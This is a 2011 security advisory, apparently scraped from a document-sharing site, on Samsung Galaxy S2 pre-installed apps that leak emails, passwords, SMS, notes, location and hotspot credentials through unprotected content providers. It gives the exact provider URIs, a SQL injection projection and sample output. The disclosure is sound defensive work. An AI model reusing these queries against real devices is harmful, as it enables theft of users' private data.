Multiple Samsung (Android) Application Vulnerabilities
|
|
- Pamela Tyler
- 6 years ago
- Views:
Transcription
1 Multiple Samsung (Android) Application Vulnerabilities MWR InfoSecurity Advisory 13/12/2011 Name Multiple pre-installed Samsung applications Date 13 th December 2011 Affected Versions Samsung Galaxy S2 (I9100XWKI4) Android Other models running these applications may be affected CVE Reference Authors Severity Local/Remote Vulnerability Class Vendor Vendor Response None Tyrone Erasmus Mike Auty (Channels SQLi) High Risk Local Android Content Providers Samsung Vendor updated all vulnerable software and firmware releases after 13 th March 2012 contain the fixes. Description Many Samsung applications are pre-installed by default on Samsung Android devices and these applications cannot be removed by the user. Some of these applications make use of content providers which are implicitly exported by default. This results in these content providers allowing other applications on the device to request sensitive information and successfully obtain it. This is cause for concern as any 3 rd party application containing malicious code does not require any granted permissions in order to obtain sensitive information from these applications. It should be noted that only applications disclosing potentially sensitive information are being reported on in this document. The following applications allow the retrieval of sensitive information from their content providers without any granted permissions: Obtainable Version address password contents Instant messages com.sec.android.socialhub Social networking messages MWR InfoSecurity 1 of 10
2 com.sec.android.im (IM) Instant messages IM contacts com.android.providers.telephony (Dialer Storage) SMS com.sec.android.provider.logsprovider (LogsProvider) SMS contents Instant messages Social networking messages Call logs 1.0 com.sec.android.widgetapp.weatherclock (AccuWeather.com) Location com.sec.android.app.minidiary (MiniDiary) Notes Photo GPS coordinates 1.0 com.sec.android.app.memo (Memo) Notes 1.0 com.sec.android.widgetapp.postit (Minipaper) Notes 1.0 com.osp.app.signin (Samsung account) Encrypted account information 1.0 com.android.providers.settings (Settings Storage) Portable Wi-Fi hotspot credentials Impact Malicious applications installed on the same device as the vulnerable applications could steal sensitive information from the user and transmit it back to the attacker. Cause These vulnerabilities are present because insufficient security permissions are set on the content provider section in each of the vulnerable application s AndroidManifest.xml file. MWR InfoSecurity 2 of 10
3 Interim Workaround Avoid using the vulnerable applications if you do not have access to the firmware update. To clear information stored in these applications go to Settings->Applications->Manage Applications and press Clear data. Solution In the AndroidManifest.xml file of each application that contains a content provider, it was recommended that read and write permissions are set. An example is shown below: <provider android:name=".db.provider android:authorities="com.example.app" android:readpermission="com.example.app.provider.permission.read" android:writepermission="com.example.app.provider.permission.write" /> This means that an application wanting to read or write to this content provider needs to have the stated permissions in order to do so. MWR InfoSecurity 3 of 10
4 Technical Description The following section will be organised by the information that is obtainable by an unprivileged application. The premise of this section is that an application with no granted permissions can perform a query on the specified content providers in order to obtain the targeted information. When querying a content provider, methods are provided that allows the developer to construct SQL statements. The following is what the query method in Android looks like to a developer: query(uri, projection, selection, selectionargs, sortorder) These parameters get used at various points in a SQL statement to construct the query. This also means that there is often SQL injection vulnerabilities present in these fields on content providers. Registered user accounts within Social Hub and their associated service. Uri: content://com.seven.provider. /accounts Projection: user_name, provision_name user_name provision_name testaccount@yahoo.com Yahoo! Messenger testaccount@yahoo.com Yahoo! Mail The password for instant messaging accounts within Social Hub. This password is often the same for the account and IM account on services like Yahoo and Google. Uri: content://com.seven.provider. /dbprefs _id category type key value flags 242 Account-6 5 Z7_IM_CLIENT_SETTING_PASSWORD_STRING Password123 0 MWR InfoSecurity 4 of 10
5 messages. Uri: content://com.seven.provider. / s Projection: _id, _from, subject, body _id _from subject body 30 Test subject contents com.sec.android.provider.logsprovider (LogsProvider) messages. Uri: content://logs/ _seven Projection: messageid, address, m_subject, m_content messageid address m_subject m_content 30 Test subject contents All accounts registered in Social Hub have their contents logged. This query to the logs content provider shows the same data as com.seven.provider. provider except that even if the account gets deregistered or removed from Social Hub, the logs still persist. Instant Messages Get all contacts. Uri: content://com.seven.provider.im/contacts Projection: contact John Paul Susan MWR InfoSecurity 5 of 10
6 Get instant messages from Social Hub. Uri: content://com.seven.provider.im/messages Projection: _id, contact, account, body _id contact account body 14 John 6 Hi, how are you? com.sec.android.provider.logsprovider (LogsProvider) Get the same instant message as above, except from the logs. Uri: content://logs/im Projection: account_id, name, m_content account_id buddy_name message 6 John Hi, how are you? The logs persist even after an IM account has been deregistered. com.sec.android.im (IM) Get the same instant message as above, except from the IM application itself. Uri: content://com.tecace.app.convprovider Projection: _id, accountid, buddy_name, message _id accountid buddy_name message 3-1 null Hi, how are you? MWR InfoSecurity 6 of 10
7 SMS com.android.providers.telephony (Dialer Storage) All SMS messages. Uri: content://channels Projection: * FROM sms;-- _id thread_id address person date protocol read status type reply_path_present subject body service_center locked error_code seen deletable hidden group_id group_type delivery_date null null null null This is a message from me to you null null null SQL injection exists within the projection and selection parameters for the channels content provider. com.sec.android.provider.logsprovider (LogsProvider) First 50 characters of SMS messages. Uri: content://logs/historys Projection: number, m_content Selection: number like '+%' number m_content This is a message from me to you MWR InfoSecurity 7 of 10
8 Social Networking Messages com.sec.android.socialhub Messages from Social Networks. Uri: content://com.sec.android.socialhub.unifiedinbox/messages Projection: name,m_subject,m_content name m_subject m_content John Smith Birthday Are you coming to my party? Notes com.sec.android.app.minidiary (MiniDiary) All notes entries, photos and photo locations. Uri: content://com.sec.android.providers.minidiary.minidiarydata/diary Projection: _id, location, date, longitude, latitude, picture_file, note _id location date longitude latitude picture_file note 1 Germany, Hesse /data/data/com.sec.android.app.minidiary/files/picture/ jpg Beautiful! It should also be noted that on Android the contents of the SD card are accessible from any application, allowing applications to retrieve them and upload them to an attacker. com.sec.android.app.memo (Memo) User notes stored in this application. Uri: content://com.samsung.sec.android/memo/all Projection: _id, title, content _id title content Note contents MWR InfoSecurity 8 of 10
9 com.sec.android.widgetapp.postit (Minipaper) User notes stored in this application. Uri: content://com.sec.android.widgetapp.postit/postit Projection: _id, body _id body 1 My first postit! Miscellaneous com.sec.android.socialhub Name of the owner of the device. Uri: content://com.sec.android.socialhub.unifiedinbox/sns_msg_receiver_map Projection: receiver_name Tyrone Erasmus com.sec.android.widgetapp.weatherclock (AccuWeather.com) General location of the owner of the device. Uri: content://com.sec.android.widgetapp.weatherclock NAME STATE LOCATION MAIN_DISPLAY SUMMER_TIME LATITUDE LONGITUDE PROVIDER Pretoria Gauteng, South Africa cityid: MWR InfoSecurity 9 of 10
10 com.osp.app.signin (Samsung account) Obtain encrypted Samsung account settings. Uri: content://com.osp.contentprovider.ospcontentprovider/identity Value Key <base64_value> UserID <base64_value> ID <base64_value> Password <base64_value> MobileCountryCode <base64_value> AuthToken <base64_value> AuthTokenSecret <base64_value> BirthDate <base64_value> UserDeviceID It should be noted that the <base64_value> given above is an encrypted string that has been base64 encoded. If the mechanism that encrypts and decrypts this data is found to be weak, the user s Samsung account would be compromised. com.android.providers.settings (Settings Storage) Portable Wi-Fi hotspot credentials. Uri: content://settings/secure _id name value 2736 wifi_ap_passwd h0tsp0tp@ssw0rd 2859 wifi_ap_ssid Hotspot1234 MWR InfoSecurity 10 of 10
MWR InfoSecurity Security Advisory. Oracle Enterprise Manager SQL Injection Advisory. 1 st February 2010
MWR InfoSecurity Security Advisory Oracle Enterprise Manager SQL Injection Advisory 1 st February 2010 2010-11-12 Page 1 of 8 CONTENTS CONTENTS 1 Detailed Vulnerability Description... 4 1.1 Introduction...
More informationAndroid Samsung Galaxy S6 Edge
Android 6.0.1 Samsung Galaxy S6 Edge Access your quick menu by using two fingers to pull down the menu from the top-center of the screen. You can use this to quickly turn your Wi-Fi, Location, Bluetooth,
More informationFrequently Asked Questions WPA2 Vulnerability (KRACK)
Frequently Asked Questions WPA2 Vulnerability (KRACK) Release Date: October 20, 2017 Document version: 1.0 What is the issue? A research paper disclosed serious vulnerabilities in the WPA and WPA2 key
More informationMWR InfoSecurity Security Advisory. IBM WebSphere MQ - rrilookupget Remote Denial of Service Vulnerability. 4th March 2010
MWR InfoSecurity Security Advisory IBM WebSphere MQ - rrilookupget Remote Denial of Service Vulnerability 4th March 2010 2010-03-04 Page 1 of 9 Contents Contents 1 Detailed Vulnerability Description...
More informationMWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS
Quit MWR InfoSecurity Advisory Elastic Path Administrative Session Hijacking through Embedded XSS 26 th April 2007 2007-04-26 1 of 7 INDEX 1 Detailed Vulnerability description...4 1.1 Introduction...4
More informationMWR InfoSecurity Security Advisory. DotNetNuke Cross Site Request Forgery Vulnerability Contents
Contents MWR InfoSecurity Security Advisory DotNetNuke Cross Site Request Forgery Vulnerability 2010-06-14 2010-06-14 Page 1 of 7 Contents Contents 1 Detailed Vulnerability Description... 4 1.1 Introduction...
More informationME?
ME? VULNEX: Blog: Twitter: www.vulnex.com www.simonroses.com @simonroses TALK OBJECTIVES Apps are the new Web Peek into current state of Apps security on Markets Bugs will be revealed but not the victims
More informationDrone /12/2018. Threat Model. Description. Threats. Threat Source Risk Status Date Created
Drone - 2 04/12/2018 Threat Model Description Threats Threat Source Risk Status Date Created Mobile Phone: Sensitive Data Leakage Smart Devices Mobile Phone: Session Hijacking Smart Devices Mobile Phone:
More informationMobile Malfeasance. Exploring Dangerous Mobile Code. Jason Haddix, Director of Penetration Testing
Mobile Malfeasance Exploring Dangerous Mobile Code Jason Haddix, Director of Penetration Testing Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to
More informationEffective Strategies for Managing Cybersecurity Risks
October 6, 2015 Effective Strategies for Managing Cybersecurity Risks Larry Hessney, CISA, PCI QSA, CIA 1 Everybody s Doing It! 2 Top 10 Cybersecurity Risks Storing, Processing or Transmitting Sensitive
More informationMWR InfoSecurity Security Advisory. IBM WebSphere MQ - rridecompress Remote Denial of Service Vulnerability. 4th March 2010
MWR InfoSecurity Security Advisory IBM WebSphere MQ - rridecompress Remote Denial of Service Vulnerability 4th March 2010 2010-03-04 Page 1 of 9 Contents Contents 1 Detailed Vulnerability Description...
More informationSymantec Endpoint Protection Mobile - Admin Guide v3.2.1 May 2018
Symantec Endpoint Protection Mobile - Admin Guide v3.2.1 May 2018 Symantec Endpoint Protection Mobile - Admin Guide Documentation version: 3.0 This document was last updated on: August 21, 2017 Legal Notice
More informationBank Infrastructure - Video - 1
Bank Infrastructure - 1 05/09/2017 Threats Threat Source Risk Status Date Created Account Footprinting Web Browser Targeted Malware Web Browser Man in the browser Web Browser Identity Spoofing - Impersonation
More informationMOBILE SECURITY OVERVIEW. Tim LeMaster
MOBILE SECURITY OVERVIEW Tim LeMaster tim.lemaster@lookout.com Your data center is in the cloud. Your users and customers have gone mobile. Starbucks is your fall-back Network. Your mobile device is a
More informationMWR InfoSecurity Security Advisory. IBM Lotus Domino Accept- Language Stack Overflow. 20 th May Contents
Contents MWR InfoSecurity Security Advisory IBM Lotus Domino Accept- Language Stack Overflow 20 th May 2008 2008-05-20 Page 1 of 8 Contents Contents 1 Detailed Vulnerability Description...5 1.1 Introduction...5
More informationQuick Heal Mobile Security. Free protection for your Android phone against virus attacks, unwanted calls, and theft.
Quick Heal Mobile Security Free protection for your Android phone against virus attacks, unwanted calls, and theft. Product Highlights Complete protection for your Android device that simplifies security
More informationSamsung Knox Mobile Enrollment. VMware Workspace ONE UEM 1902
Samsung Knox Mobile Enrollment VMware Workspace ONE UEM 1902 You can find the most up-to-date technical documentation on the VMware website at: https://docs.vmware.com/ If you have comments about this
More informationLayer Seven Security ADVISORY
Layer Seven Security ADVISORY SAP Security Notes April 2015 The most critical patch released by SAP in April corrected a missing authentication check in Sybase Adaptive Server Enterprise (ASE). ASE is
More informationAT&T Global Network Client for Android
AT&T Global Network Client for Android 2019 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property. Version 4.2.5 January 9, 2019 Added TLS
More informationYou will need to enter your outgoing mail server information, here is a list of common outgoing mail servers for free accounts:
MacTrak Installation Guide 1. Run the installer (Note: When installation is complete the system will need to be rebooted, please make sure you save and close any other applications running on your system)
More informationNOTICE SDHC/SDXC MEMORY CARD WITH EMBEDDED WIRELESS LAN
NOTICE SDHC/SDXC MEMORY CARD WITH EMBEDDED WIRELESS LAN FUNCTIONALITY FLASHAIR MAY HAVE A SECURITY VULNERABILITY RELATED TO THE GENERATION AND MANAGEMENT OF WPA2 KEY 17 OCTOBER 2017 Toshiba Memory Corporation
More informationMWR InfoSecurity Security Advisory. Intersystems Caché CSP (Caché Server Pages) Stack Overflow. 17 th December 2009
MWR InfoSecurity Security Advisory Intersystems Caché CSP (Caché Server Pages) Stack Overflow 17 th December 2009 2009-12-17 Page 1 of 8 CONTENTS CONTENTS 1 Detailed Vulnerability Description... 5 1.1
More informationTo configure Exchange ActiveSync on the device the following information is needed.
Smart Device Syncing Practices The Novell Data Synchronizer for Mobility is the product used to synchronize GroupWise mail, contacts and calendar items to a mobile device. First the GroupWise account must
More informationQuick Heal Total Security for Android. Anti-Theft Security. Web Security. Backup. Real-Time Protection. Safe Online Banking & Shopping.
Quick Heal Total Security for Android Anti-Theft Security. Web Security. Backup. Real-Time Protection. Safe Online Banking & Shopping. Product Highlights Complete protection for your Android device that
More informationWhat someone said about junk hacking
What someone said about junk hacking Yes, we get it. Cars, boats, buses, and those singing fish plaques are all hackable and have no security. Most conferences these days have a! whole track called "Junk
More informationAttacks Against Websites. Tom Chothia Computer Security, Lecture 11
Attacks Against Websites Tom Chothia Computer Security, Lecture 11 A typical web set up TLS Server HTTP GET cookie Client HTML HTTP file HTML PHP process Display PHP SQL Typical Web Setup HTTP website:
More informationCisco Webex Messenger
Cisco Webex Messenger This describes the processing of personal data (or personal identifiable information) by Cisco Webex Messenger. 1. Overview of Cisco Webex Messenger Capabilities Cisco Webex Messenger
More informationEthical Hacking and Countermeasures: Secure Network Operating Systems and Infrastructures, Second Edition
Ethical Hacking and Countermeasures: Secure Network Operating Systems and Infrastructures, Second Edition Chapter 7 Hacking Mobile Phones, PDAs, and Handheld Devices Objectives After completing this chapter,
More information-- User Manual -- Sycret Cloud. Page 1
Sycret Cloud Page 1 Table of Contents 1 SYSTEM REQUIREMENT........Page.3 2 GETTING STARTED 2.1 HOW TO START SYCRET CLOUD...Page.3 2.2 FIRST-RUN INITIALIZATION....Page.3 3 INSTRUCTIONS 3.1 FILE ENCRYPTION/DECRYPTION.....Page.5
More informationBuild Acceptance, Exploration, Negative, UI, Compatibility, System, Performance, Usability, Functional, Regression, Stress
General Information Application Under Test Linphone Software Build ID # 2.1.2 Order Date 18-Jul-2013 Package Complete Scan Included Testing Build Acceptance, Exploration, Negative, UI, Compatibility, System,
More informationVodafone Secure Device Manager Administration User Guide
Vodafone Secure Device Manager Administration User Guide Vodafone New Zealand Limited. Correct as of June 2017. Vodafone Ready Business Contents Introduction 3 Help 4 How to find help in the Vodafone Secure
More informationE-BOOK // SAMSUNG GALAXY 3 TABLET MANUAL
01 December, 2018 E-BOOK // SAMSUNG GALAXY 3 TABLET MANUAL Document Filetype: PDF 387.62 KB 0 E-BOOK // SAMSUNG GALAXY 3 TABLET MANUAL Look Up Results on Infospace.com. Get access to helpful solutions,
More informationFive steps to securing personal data online Gary Shipsey Managing Director
Five steps to securing personal data online Gary Shipsey Managing Director 25 September 2014 Agenda Learn from the mistakes of others and protect personal information online. 1 2 Where does your information
More informationepldt Web Builder Security March 2017
epldt Web Builder Security March 2017 TABLE OF CONTENTS Overview... 4 Application Security... 5 Security Elements... 5 User & Role Management... 5 User / Reseller Hierarchy Management... 5 User Authentication
More informationWorkflow INSTALLATION GUIDE
Workflow INSTALLATION GUIDE Perspective by PPM Version 2.0 Printed September 2013 Copyright 2013 PPM 2000 Inc. and its licensors. All rights reserved. PPM 2000, the PPM 2000 logo, Perspective by PPM 2000,
More information14FC Works Geotagging Mobile app Telangana Guidelines
14FC Works Geotagging Mobile app Telangana Guidelines DOWNLOAD Directions: Go to CDMA portal www.cdma.telangana.gov.in and go to section 14FC Geo Tagging app Download. You will be redirected to below screen
More informationBuild Acceptance, Exploration, Negative, User Interface, Compatibility, System. ExploraBon UI CompaBbility NegaBve Build Acceptance
Application Under Test Linphone Software Build ID # 2.1.2 Order Date 18-Jul-2013 Package Effective Scan Included Testing Build Acceptance, Exploration, Negative, User Interface, Compatibility, System Test
More informationSECURITY TESTING. Towards a safer web world
SECURITY TESTING Towards a safer web world AGENDA 1. 3 W S OF SECURITY TESTING 2. SECURITY TESTING CONCEPTS 3. SECURITY TESTING TYPES 4. TOP 10 SECURITY RISKS ate: 2013-14 Few Security Breaches September
More informationMWR InfoSecurity Security Advisory. Sophos RMS / TAO Component DoS Vulnerability. 16 th January Contents
Contents MWR InfoSecurity Security Advisory Sophos RMS / TAO Component DoS Vulnerability 16 th January 2009 2009-01-16 Page 1 of 9 Contents Contents 1 Detailed Vulnerability Description...5 1.1 Introduction...5
More information12 th January MWR InfoSecurity Security Advisory. WebSphere MQ xcsgetmem Heap Overflow Vulnerability. Contents
Contents MWR InfoSecurity Security Advisory WebSphere MQ xcsgetmem Heap Overflow Vulnerability 12 th January 2009 2009-01-05 Page 1 of 9 Contents Contents 1 Detailed Vulnerability Description...5 1.1 Introduction...5
More informationSecurity Philosophy. Humans have difficulty understanding risk
Android Security Security Philosophy Humans have difficulty understanding risk Safer to assume that Most developers do not understand security Most users do not understand security Security philosophy
More informationCopyright
1 Security Test EXTRA Workshop : ANSWER THESE QUESTIONS 1. What do you consider to be the biggest security issues with mobile phones? 2. How seriously are consumers and companies taking these threats?
More informationWorldwide Release. Your world, Secured ND-IM005. Wi-Fi Interception System
Your world, Secured 2016 Worldwide Release System Overview Wi-Fi interception system is developed for police operations and searching of information leaks in the office premises, government agencies and
More informationPERSPECTIVE WORKFLOW INSTALLATION GUIDE
PERSPECTIVE WORKFLOW INSTALLATION GUIDE Version 2.0 June 2015 Perspective by Resolver Perspective Workflow Version 2.0 Distributed June 2015 Copyright 2015 Resolver Inc. and its licensors. All rights reserved.
More informationMWR InfoSecurity Security Advisory. IBM Lotus Domino icalendar Address Stack Buffer Overflow Vulnerability. 14 th September 2010
MWR InfoSecurity Security Advisory IBM Lotus Domino icalendar Email Address Stack Buffer Overflow Vulnerability 14 th September 2010 2010-11-12 Page 1 of 8 CONTENTS CONTENTS 1 Detailed Vulnerability Description...
More informationCyber Security Advisory
1KHW028570 2015-11-20 English 2.00 1/5 SSL 3.0 Protocol Vulnerability and POODLE Attack in FOX660 series ABB-VU-PSAC- 1KHW028570 Notice The information in this document is subject to change without notice,
More informationPilot Walktour Pack Quick Start V3.4
Pilot Walktour Pack Quick Start V3.4 Contents Contents 1 Overview... 1 1.1 About the Product... 1 1.2 About the Document... 2 2 Install Walktour Pack on ipad... 3 2.1 Before Installation... 3 2.2 Apply
More informationANDROID PRIVACY & SECURITY GUIDE ANDROID DEVICE SETTINGS
ANDROID PRIVACY & SECURITY GUIDE WESNET The Women s Services Network Smartphones store a lot of personal information, including email or social media accounts, reminders and notes, the number of steps
More informationSecurity Trend of New Computing Era
Security Trend of New Computing Era Presented by Roland Cheung HKCERT Agenda Security Threat Overview Introduction of Botnet Impact of Botnet Fight Back Botnet Security Protection Scheme Security Threat
More informationCYBERSECURITY RISK LOWERING CHECKLIST
CYBERSECURITY RISK LOWERING CHECKLIST The risks from cybersecurity attacks, whether external or internal, continue to grow. Leaders must make thoughtful and informed decisions as to the level of risk they
More informationComprehensive Database Security
Comprehensive Database Security Safeguard against internal and external threats In today s enterprises, databases house some of the most highly sensitive, tightly regulated data the very data that is sought
More informationGetting Started With Your New Nokia Lumia Windows Phone
Getting Started With Your New Nokia Lumia Windows Phone If you just purchased a Nokia Lumia and you re not sure how to set it up, this guide is for you. Let s start with the basics. When turning your phone
More informationThe SAP Concur mobile app (Android / iphone / ipad)
The SAP Concur mobile app (Android / iphone / ipad) Questions General Information and Requirements... 1 1. How is the SAP Concur mobile app useful?... 1 2. Does the mobile app offer the same functionality
More informationSECURITY BULLETIN - HART Vulnerability in ABB Third Party Device Type Library
SECURITY BULLETIN - HART Vulnerability in ABB Third Party Device Type Library Notice The information in this document is subject to change without notice, and should not be construed as a commitment by
More informationEvaluating the Security Risks of Static vs. Dynamic Websites
Evaluating the Security Risks of Static vs. Dynamic Websites Ballard Blair Comp 116: Introduction to Computer Security Professor Ming Chow December 13, 2017 Abstract This research paper aims to outline
More informationMWR InfoSecurity Security Advisory. Mozilla Firefox 64-Bit SetTextInternal () Heap Buffer Overflow. 23 rd June 2010
MWR InfoSecurity Security Advisory Mozilla Firefox 64-Bit SetTextInternal () Heap Buffer Overflow 23 rd June 2010 Package Name: Mozilla Firefox Discovery Date: 14 th December 2009 Affected Versions: Firefox
More informationTrend Micro Incorporated reserves the right to make changes to this document and to the products described herein without notice. Before installing and using the product, please review the readme files,
More informationTrend Micro Incorporated reserves the right to make changes to this document and to the products described herein without notice. Before installing and using the product, please review the readme files,
More informationTrial Guide. June 2018 Samsung Electronics. A new way to control OS version for B2B customers
A new way to control OS version for B2B customers Trial Guide June 2018 Samsung Electronics Functionalities and specifications are subject to change without notice Overview What is? E-FOTA : Enterprise
More informationCombating Common Web App Authentication Threats
Security PS Combating Common Web App Authentication Threats Bruce K. Marshall, CISSP, NSA-IAM Senior Security Consultant bmarshall@securityps.com Key Topics Key Presentation Topics Understanding Web App
More informationUser Help
ginlo @work User Help 19 June 2018 Contents Get started... 5 System requirements for the ginlo @work app... 5 Recommended browsers for ginlo websites... 6 Supported languages... 6 Navigation in ginlo @work...
More informationWayward Wi-Fi. How Rogue Hotspots Can Hijack Your Data and Put Your Mobile Devices at Risk
Wayward Wi-Fi How Rogue Hotspots Can Hijack Your Data and Put Your Mobile Devices at Risk 288 MILLION There are more than 288 million unique Wi-Fi networks worldwide. Source: Wireless Geographic Logging
More informationQuick Heal Mobile Security. Anti-Theft Security. Real-Time Protection. Safe Online Banking & Shopping.
Anti-Theft Security. Real-Time Protection. Safe Online Banking & Shopping. Product Highlights With an easy-to-update virus protection and a dynamic yet simple interface, virus removal from your mobile
More informationSecuring PostgreSQL From External Attack
Securing From External Attack BRUCE MOMJIAN, ENTERPRISEDB September, 2009 Abstract systems are rich with attack vectors to exploit. This presentation explores the many potential external vulnerabilities
More informationSecurity Advisory Relating to the Speculative Execution Vulnerabilities with some microprocessors
SECURITY ADVISORY Processor based Speculative Execution Vulnerabilities AKA Spectre and Meltdown Version 1.6 Security Advisory Relating to the Speculative Execution Vulnerabilities with some microprocessors
More informationPilot Walktour Pack Quick Start V3.6
Pilot Walktour Pack Quick Start V3.6 Contents Contents 1 Overview... 1 1.1 About the Product... 1 1.2 About the Document... 2 2 Install Walktour Pack on ipad... 3 2.1 Before Installation... 3 2.2 Apply
More informationW e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s
W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s Session I of III JD Nir, Security Analyst Why is this important? ISE Proprietary Agenda About ISE Web Applications
More informationZimperium Global Threat Data
Zimperium Global Threat Report Q2-2017 700 CVEs per Year for Mobile OS 500 300 100 07 08 09 10 11 12 13 14 15 16 17 Outdated ios Outdated ANDROID 1 of 4 Devices Introduces Unnecessary Risk 1 out of 50
More informationProtecting Your Devices. Dr. Leon D. Chapman
Protecting Your Devices Dr. Leon D. Chapman 1 Device Security Threats to Devices Scams Passwords Secure your Device Security Apps / Solutions 2 Mobile device security threats ( http://www.csoonline.com/article/2157785/data-protection/five-new-threatsto-your-mobile-device-security.html
More informationRequirements for IT Infrastructure
Requirements for IT Infrastructure This information contained in this document is taken from the NCSC Website directly via: https://www.cyberessentials.ncsc.gov.uk/requirements-for-it-infrastructure.html
More informationAxon Capture for Android Devices User Manual
Axon Capture for Android Devices User Manual IMPORTANT SAFETY INSTRUCTIONS Read all warnings and instructions. Save these Instructions. The most up-to-date warnings and instructions are available at www.taser.com.
More information3CX Mobile Device Manager
3CX Mobile Device Manager Manual 1 Copyright 2013, 3CX Ltd. http://www.3cx.com E-mail: info@3cx.com Information in this document is subject to change without notice. Companies names and data used in examples
More informationLechange App. User s Manual V1.0.0
Lechange App User s Manual V1.0.0 Cybersecurity Recommendations Mandatory actions to be taken towards cybersecurity 1. Change Passwords and Use Strong Passwords: The number one reason systems get hacked
More informationWatchGuard AP - Remote Code Execution
WatchGuard AP - Remote Code Execution Security Advisory Date 1/05/2018 Version: 1.0 Table of Contents 1. Document Control... 2 1.1. Document Information... 2 1.2. Revision Control... 2 2. Background...
More informationWhy This Topic Is Essential For ICS/SCADA
Introduction Executive Security Consultant for Securicon 15+ years in Information Security Coauthor of Building A Security Awareness Program Social Engineering trainer Physical access enthusiast Agenda
More informationCyber Security Advisory
Ellipse201703 2017-11-27 English 1.0 1/7 Ellipse8 Security Vulnerability ABBVU-PSSW-201703 Update Date: 11/21/2017 Notice The information in this document is subject to change without notice, and should
More informationCyber Essentials. Requirements for IT Infrastructure. QG Adaption Publication 25 th July 17
Cyber Essentials Requirements for IT Infrastructure NCSC Publication 6 th February 17 QG Adaption Publication 25 th July 17 Document No. BIS 14/696/1.2 Requirements for IT Infrastructure Specifying the
More informationSamsung Galaxy S 2.1 to 2.3 Update Instructions
Samsung Galaxy S 2.1 to 2.3 Update Instructions NOTE: Based on the software version you are upgrading from, the upgrade will perform different procedures and will required multiple mobile device reboots.
More informationEndpoint Security - what-if analysis 1
Endpoint Security - what-if analysis 1 07/23/2017 Threat Model Threats Threat Source Risk Status Date Created File Manipulation File System Medium Accessing, Modifying or Executing Executable Files File
More informationMethodology USA UK AUSTRALIA CANADA JAPAN N=1,008 MOE=+/-3% N=1,044 MOE=+/- 3% N=1,028 MOE=+/- 3% N=1,025 MOE=+/- 3% N=1,005 MOE=+/- 3%
Norton by Symantec commissioned an online survey across nine countries in order to better understand consumers public Wi-Fi perceptions and practices, unveiling consumer misconceptions and worries about
More informationQuick Heal Total Security for Android. Anti-Theft Security. Web Security. Backup. Real-Time Protection. Safe Online Banking & Shopping.
Anti-Theft Security. Web Security. Backup. Real-Time Protection. Safe Online Banking & Shopping. Product Highlights Complete protection for your Android device that simplifies security and significantly
More informationFor a complete list of modifications included in this update please refer to the Release Notes section at the bottom of this document.
GALAXY S 2.2 UPDATE New features and enhancements - Speed enhancements - Flash 10.x support - Samsung Media Hub - Save apps to your SD card to save internal memory - Support for new Google apps and other
More informationCh 1: The Mobile Risk Ecosystem. CNIT 128: Hacking Mobile Devices. Updated
Ch 1: The Mobile Risk Ecosystem CNIT 128: Hacking Mobile Devices Updated 1-12-16 The Mobile Ecosystem Popularity of Mobile Devices Insecurity of Mobile Devices The Mobile Risk Model Mobile Network Architecture
More informationSAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0
Welcome BIZEC Roundtable @ IT Defense, Berlin SAP Security BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0 February 1, 2013 Andreas Wiegenstein CTO, Virtual Forge 2 SAP Security SAP security is a complex
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationStraight talk galaxy s4 how to put in unlock code
Straight talk galaxy s4 how to put in unlock code The Borg System is 100 % Straight talk galaxy s4 how to put in unlock code Unlocking your Samsung Galaxy S4 so you can use a different SIM card isn't the
More informationSecurity in Bomgar Remote Support
Security in Bomgar Remote Support 2018 Bomgar Corporation. All rights reserved worldwide. BOMGAR and the BOMGAR logo are trademarks of Bomgar Corporation; other trademarks shown are the property of their
More informationSecurity of End User based Cloud Services Sang Young
Security of End User based Cloud Services Sang Young Chairman, Mobile SIG Professional Information Security Association sang.young@pisa.org.hk Cloud Services you can choose Social Media Business Applications
More informationOPEN WEB APPLICATION SECURITY PROJECT OWASP TOP 10 VULNERABILITIES
OPEN WEB APPLICATION SECURITY PROJECT OWASP TOP 10 VULNERABILITIES What is the OWASP Top 10? A list of the top ten web application vulnerabilities Determined by OWASP and the security community at large
More informationBasware - Verian Mobile App Guide Basware P2P 18.2
Basware - Verian Mobile App Guide Basware P2P 18.2 Copyright 1999-2018 Basware Corporation. All rights reserved.. 1 Introduction The mobile app is a streamlined tool that allows you to take pictures of
More informationAEM Mobile: Setting up Google as an Identity Provider
AEM Mobile: Setting up Google as an Identity Provider Requirement: Prerequisite knowledge Understanding of AEM Mobile Required Products AEM Mobile Google Account Generating the client ID and secret To
More informationTHE NEW LANDSCAPE OF AIRBORNE CYBERATTACKS
SESSION ID: MBS-W04 THE NEW LANDSCAPE OF AIRBORNE CYBERATTACKS Nadir Izrael CTO & Co-Founder Armis, Inc. Ben Seri Head of Research Armis, Inc. Placeholder Slide: Image of spread of infection Placeholder
More informationLayer Seven Security ADVISORY
Layer Seven Security ADVISORY SAP Security Notes June 2014 SAP released an important notification in June to highlight a critical vulnerability in SAP Afaria, the Sybase platform that enables centralized
More informationSAMSUNG GALAXY TAB TUTORIAL CONTENT
1 SAMSUNG GALAXY TAB TUTORIAL CONTENT SYNCHRONISATION WITH KIES...2 FIRST USE SETUP...3 ICONS AND NAVIGATION...4 ACCESS THE WIRELESS NETWORK...5 E-MAIL AND CALENDAR SETUP...7 E-MAIL FUNCTIONALITY...9 CALENDAR
More informationComodo Mobile Security for Android Software Version 2.5
Comodo Mobile Security for Android Software Version 2.5 User Guide Guide Version 2.5.010215 Comodo Security Solutions 1255 Broad Street Clifton, NJ 07013 Table of Contents 1.Introduction to Comodo Mobile
More informationSecurity Enhancements in Informatica 9.6.x
Security Enhancements in Informatica 9.6.x 1993-2016 Informatica Corporation. No part of this document may be reproduced or transmitted in any form, by any means (electronic, photocopying, recording or
More informationTelenor MDM. Quick Start Guide
Telenor MDM Quick Start Guide February 2016 Table of content 1 Usage information... 9 1.1 About... 9 1.2 Home hyperlink... 9 1.3 Description of the warning flags... 9 1.4 Greyed (read-only) items... 10
More informationAT&T Unified Communications Services. Installing Cisco Jabber for AT&T UC Voice on an Android Smartphone
